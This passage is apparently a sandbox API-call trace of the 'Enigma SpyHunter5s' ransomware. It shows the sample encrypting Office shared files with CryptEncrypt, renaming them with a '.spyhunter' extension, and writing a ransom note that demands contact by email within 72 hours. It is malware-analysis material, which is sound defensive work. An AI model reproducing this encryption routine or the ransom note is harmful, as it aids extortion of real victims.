(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.257] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff00*=0x2ac, lpOverlapped=0x0) returned 1 [0088.257] CloseHandle (hObject=0x15c) returned 1 [0088.257] GetProcessHeap () returned 0x2c0000 [0088.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3793b8 | out: hHeap=0x2c0000) returned 1 [0088.257] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fea0 | out: pbBuffer=0x57fea0) returned 1 [0088.257] GetProcessHeap () returned 0x2c0000 [0088.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0088.257] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x57fe98*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x57fe98*=0x30) returned 1 [0088.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0088.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 108 [0088.259] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0088.259] GetProcessHeap () returned 0x2c0000 [0088.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37d468 [0088.259] ReadFile (in: hFile=0x15c, lpBuffer=0x37d468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe5c, lpOverlapped=0x0 | out: lpBuffer=0x37d468*, lpNumberOfBytesRead=0x57fe5c*=0x16fc, lpOverlapped=0x0) returned 1 [0088.309] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.309] WriteFile (in: hFile=0x15c, lpBuffer=0x37d468*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x57fe5c, lpOverlapped=0x0 | out: lpBuffer=0x37d468*, lpNumberOfBytesWritten=0x57fe5c*=0x16fc, lpOverlapped=0x0) returned 1 [0088.309] GetProcessHeap () returned 0x2c0000 [0088.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d468 | out: hHeap=0x2c0000) returned 1 [0088.309] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.310] WriteFile (in: hFile=0x15c, lpBuffer=0x57fe9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe5c, lpOverlapped=0x0 | out: lpBuffer=0x57fe9c*, lpNumberOfBytesWritten=0x57fe5c*=0x4, lpOverlapped=0x0) returned 1 [0088.310] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe5c, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x57fe5c*=0x30, lpOverlapped=0x0) returned 1 [0088.310] CloseHandle (hObject=0x15c) returned 1 [0088.310] GetProcessHeap () returned 0x2c0000 [0088.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a6878 [0088.311] wnsprintfW (in: pszDest=0x3a6878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.spyhunter") returned 118 [0088.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.spyhunter")) returned 1 [0088.783] GetProcessHeap () returned 0x2c0000 [0088.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a6878 | out: hHeap=0x2c0000) returned 1 [0088.783] GetProcessHeap () returned 0x2c0000 [0088.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0088.783] GetProcessHeap () returned 0x2c0000 [0088.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b5a8 | out: hHeap=0x2c0000) returned 1 [0088.783] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe98 | out: pbBuffer=0x57fe98) returned 1 [0088.784] GetProcessHeap () returned 0x2c0000 [0088.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0088.784] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x57fe90*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x57fe90*=0x30) returned 1 [0088.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0088.784] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0088.784] StrStrW (lpFirst="Proofing.XML", lpSrch=".txt") returned 0x0 [0088.784] GetProcessHeap () returned 0x2c0000 [0088.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0088.784] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x57fe54*=0x32b, lpOverlapped=0x0) returned 1 [0089.246] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.246] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x57fe54*=0x32b, lpOverlapped=0x0) returned 1 [0089.246] GetProcessHeap () returned 0x2c0000 [0089.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0089.246] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.247] WriteFile (in: hFile=0x15c, lpBuffer=0x57fe94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x57fe94*, lpNumberOfBytesWritten=0x57fe54*=0x4, lpOverlapped=0x0) returned 1 [0089.247] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x57fe54*=0x30, lpOverlapped=0x0) returned 1 [0089.247] CloseHandle (hObject=0x15c) returned 1 [0089.248] GetProcessHeap () returned 0x2c0000 [0089.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.248] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.spyhunter") returned 121 [0089.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.spyhunter")) returned 1 [0089.249] GetProcessHeap () returned 0x2c0000 [0089.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.249] GetProcessHeap () returned 0x2c0000 [0089.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0089.249] GetProcessHeap () returned 0x2c0000 [0089.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b480 | out: hHeap=0x2c0000) returned 1 [0089.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe98 | out: pbBuffer=0x57fe98) returned 1 [0089.249] GetProcessHeap () returned 0x2c0000 [0089.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0089.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x57fe90*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x57fe90*=0x30) returned 1 [0089.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.250] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0089.250] StrStrW (lpFirst="MSWDS_ES.LEX", lpSrch=".txt") returned 0x0 [0089.250] GetProcessHeap () returned 0x2c0000 [0089.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0089.250] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x57fe54*=0x2800, lpOverlapped=0x0) returned 1 [0089.271] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.271] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x57fe54*=0x2800, lpOverlapped=0x0) returned 1 [0089.272] GetProcessHeap () returned 0x2c0000 [0089.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0089.272] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.272] WriteFile (in: hFile=0x15c, lpBuffer=0x57fe94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x57fe94*, lpNumberOfBytesWritten=0x57fe54*=0x4, lpOverlapped=0x0) returned 1 [0089.283] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe54, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x57fe54*=0x30, lpOverlapped=0x0) returned 1 [0089.283] CloseHandle (hObject=0x15c) returned 1 [0089.337] GetProcessHeap () returned 0x2c0000 [0089.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.338] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.spyhunter") returned 79 [0089.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex.spyhunter")) returned 1 [0089.358] GetProcessHeap () returned 0x2c0000 [0089.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.359] GetProcessHeap () returned 0x2c0000 [0089.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0089.359] GetProcessHeap () returned 0x2c0000 [0089.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d630 | out: hHeap=0x2c0000) returned 1 [0089.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe90 | out: pbBuffer=0x57fe90) returned 1 [0089.359] GetProcessHeap () returned 0x2c0000 [0089.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0089.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x57fe88*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x57fe88*=0x30) returned 1 [0089.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0089.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0089.443] StrStrW (lpFirst="IMCONTACT.DLL", lpSrch=".txt") returned 0x0 [0089.443] GetProcessHeap () returned 0x2c0000 [0089.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0089.443] ReadFile (in: hFile=0x178, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe4c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x57fe4c*=0x2800, lpOverlapped=0x0) returned 1 [0089.745] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.745] WriteFile (in: hFile=0x178, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe4c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x57fe4c*=0x2800, lpOverlapped=0x0) returned 1 [0089.745] GetProcessHeap () returned 0x2c0000 [0089.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0089.745] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.746] WriteFile (in: hFile=0x178, lpBuffer=0x57fe8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe4c, lpOverlapped=0x0 | out: lpBuffer=0x57fe8c*, lpNumberOfBytesWritten=0x57fe4c*=0x4, lpOverlapped=0x0) returned 1 [0089.748] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe4c, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x57fe4c*=0x30, lpOverlapped=0x0) returned 1 [0089.748] CloseHandle (hObject=0x178) returned 1 [0089.750] GetProcessHeap () returned 0x2c0000 [0089.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.750] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL.spyhunter") returned 84 [0089.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll.spyhunter")) returned 1 [0089.751] GetProcessHeap () returned 0x2c0000 [0089.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.751] GetProcessHeap () returned 0x2c0000 [0089.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0089.751] GetProcessHeap () returned 0x2c0000 [0089.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x385600 | out: hHeap=0x2c0000) returned 1 [0089.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0089.751] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0089.752] WriteFile (in: hFile=0x178, lpBuffer=0x57fdc3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57feec, lpOverlapped=0x0 | out: lpBuffer=0x57fdc3*, lpNumberOfBytesWritten=0x57feec*=0x127, lpOverlapped=0x0) returned 1 [0089.752] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0089.752] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57feec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57feec*=0x2ac, lpOverlapped=0x0) returned 1 [0089.753] CloseHandle (hObject=0x178) returned 1 [0089.753] GetProcessHeap () returned 0x2c0000 [0089.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329818 | out: hHeap=0x2c0000) returned 1 [0089.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe88 | out: pbBuffer=0x57fe88) returned 1 [0089.753] GetProcessHeap () returned 0x2c0000 [0089.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0089.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x57fe80*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x57fe80*=0x30) returned 1 [0089.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0089.754] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0089.754] StrStrW (lpFirst="BASMLA.XSL", lpSrch=".txt") returned 0x0 [0089.754] GetProcessHeap () returned 0x2c0000 [0089.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0089.754] ReadFile (in: hFile=0x178, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x57fe44*=0x2800, lpOverlapped=0x0) returned 1 [0089.829] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.829] WriteFile (in: hFile=0x178, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x57fe44*=0x2800, lpOverlapped=0x0) returned 1 [0089.829] GetProcessHeap () returned 0x2c0000 [0089.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.830] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.830] WriteFile (in: hFile=0x178, lpBuffer=0x57fe84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x57fe84*, lpNumberOfBytesWritten=0x57fe44*=0x4, lpOverlapped=0x0) returned 1 [0089.831] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x57fe44*=0x30, lpOverlapped=0x0) returned 1 [0089.831] CloseHandle (hObject=0x178) returned 1 [0089.836] GetProcessHeap () returned 0x2c0000 [0089.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.836] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.spyhunter") returned 87 [0089.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.spyhunter")) returned 1 [0089.837] GetProcessHeap () returned 0x2c0000 [0089.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.837] GetProcessHeap () returned 0x2c0000 [0089.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0089.837] GetProcessHeap () returned 0x2c0000 [0089.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372ec8 | out: hHeap=0x2c0000) returned 1 [0089.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe88 | out: pbBuffer=0x57fe88) returned 1 [0089.838] GetProcessHeap () returned 0x2c0000 [0089.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0089.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x57fe80*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x57fe80*=0x30) returned 1 [0089.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0089.896] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0089.896] StrStrW (lpFirst="WPFT532.CNV", lpSrch=".txt") returned 0x0 [0089.896] GetProcessHeap () returned 0x2c0000 [0089.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.896] ReadFile (in: hFile=0x17c, 